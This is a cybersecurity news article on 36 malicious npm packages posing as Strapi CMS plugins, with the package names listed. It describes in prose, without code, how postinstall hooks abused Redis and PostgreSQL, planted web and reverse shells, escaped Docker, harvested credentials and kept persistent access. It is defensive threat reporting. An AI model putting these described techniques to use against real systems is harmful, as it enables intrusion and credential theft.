36 Malicious npm Packages Exploit Redis and PostgreSQL to Deploy Persistent Implants
Recent cybersecurity investigations have unveiled a significant threat within the npm registry, where 36 malicious packages masquerading as Strapi CMS plugins have been discovered. These packages are designed to exploit vulnerabilities in Redis and PostgreSQL, deploy reverse shells, harvest credentials, and establish persistent implants on compromised systems.
Overview of the Threat
Each of the malicious packages contains three files: package.json, index.js, and postinstall.js. Notably, they lack descriptions, repositories, or homepages, and they use version 3.6.8 to mimic legitimate Strapi v3 community plugins. According to SafeDep, the packages are crafted to deceive developers into downloading them by adopting a naming convention that begins with “strapi-plugin-” followed by terms like “cron,” “database,” or “server.” In contrast, official Strapi plugins are properly scoped under “@strapi/.”
The packages were uploaded by four sock puppet accounts—”umarbek1233,” “kekylf12,” “tikeqemif26,” and “umar_bektembiev1″—within a span of just 13 hours. The complete list of malicious packages includes:
- strapi-plugin-cron
- strapi-plugin-config
- strapi-plugin-server
- strapi-plugin-database
- strapi-plugin-core
- strapi-plugin-hooks
- strapi-plugin-monitor
- strapi-plugin-events
- strapi-plugin-logger
- strapi-plugin-health
- strapi-plugin-sync
- strapi-plugin-seed
- strapi-plugin-locale
- strapi-plugin-form
- strapi-plugin-notify
- strapi-plugin-api
- strapi-plugin-sitemap-gen
- strapi-plugin-nordica-tools
- strapi-plugin-nordica-sync
- strapi-plugin-nordica-cms
- strapi-plugin-nordica-api
- strapi-plugin-nordica-recon
- strapi-plugin-nordica-stage
- strapi-plugin-nordica-vhost
- strapi-plugin-nordica-deep
- strapi-plugin-nordica-lite
- strapi-plugin-nordica
- strapi-plugin-finseven
- strapi-plugin-hextest
- strapi-plugin-cms-tools
- strapi-plugin-content-sync
- strapi-plugin-debug-tools
- strapi-plugin-health-check
- strapi-plugin-guardarian-ext
- strapi-plugin-advanced-uuid
- strapi-plugin-blurhash
Technical Analysis of the Malicious Code
The analysis indicates that the malicious code is embedded within the postinstall script hook, which executes automatically upon running npm install, requiring no user interaction. This execution occurs with the same privileges as the installing user, allowing it to exploit root access in CI/CD environments and Docker containers.
The evolution of the payloads associated with this campaign reveals a systematic approach to exploitation:
-
Redis Exploitation: The initial phase involves weaponizing a locally accessible Redis instance for remote code execution. This is achieved by injecting a crontab entry that downloads and executes a shell script from a remote server every minute. The script writes a PHP web shell and Node.js reverse shell to Strapi’s public uploads directory and scans for sensitive data, including Elasticsearch and cryptocurrency wallet seed phrases.
-
Docker Container Escape: The attackers combine Redis exploitation with Docker container escape techniques to write shell payloads to the host system. This phase also includes launching a direct Python reverse shell on port 4444.
-
Credential Harvesting: The payloads are designed to scan the system for environment variables and PostgreSQL database connection strings. They gather environment dumps, Strapi configurations, and Redis database information by executing commands like INFO, DBSIZE, and KEYS.
-
Database Exploitation: The attackers utilize hard-coded credentials to connect to the target’s PostgreSQL database, querying Strapi-specific tables for sensitive information. This includes extracting cryptocurrency-related data and attempting to connect to multiple Guardarian databases.
-
Persistent Access: The final phase involves deploying a persistent implant to maintain remote access to a specific hostname, along with facilitating credential theft by scanning hard-coded paths.
SafeDep noted that the progression of these payloads illustrates a clear narrative: the attackers began aggressively, pivoted to reconnaissance and data collection, and ultimately settled on maintaining persistent access while targeting credential theft.
Implications for the Cybersecurity Landscape
The nature of these payloads, particularly their focus on digital assets and the use of hard-coded credentials, suggests that this campaign may have been a targeted attack against cryptocurrency platforms. Users who have installed any of the identified packages are strongly advised to assume compromise and rotate all credentials.
This discovery aligns with a broader trend of supply chain attacks targeting the open-source ecosystem. Recent incidents include:
- A GitHub account named “ezmtebo” submitted over 256 pull requests across various open-source repositories, embedding credential exfiltration payloads that steal secrets through CI logs and PR comments.
- The hijacking of a verified GitHub organization, “dev-protocol,” to distribute malicious trading bots with typosquatted npm dependencies that steal wallet private keys and exfiltrate sensitive files.
- A compromise of the popular Emacs package, “kubernetes-el,” which exploited vulnerabilities in its GitHub Actions workflow to steal secrets and inject destructive code.
These incidents highlight the increasing sophistication of supply chain attacks, which have become a dominant force reshaping the global cyber threat landscape. As attackers target trusted vendors and open-source software, the potential for large-scale, cross-border impacts escalates.
Conclusion
The ongoing threat posed by malicious npm packages underscores the necessity for vigilance within the software development community. Package repositories such as npm and PyPI have become prime targets for attackers, who leverage stolen maintainer credentials and automated malware to compromise widely used libraries. This trend transforms development pipelines into distribution channels for malicious code, necessitating robust security measures and awareness among developers.
For further details on this evolving threat landscape, refer to the original reporting source: thehackernews.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
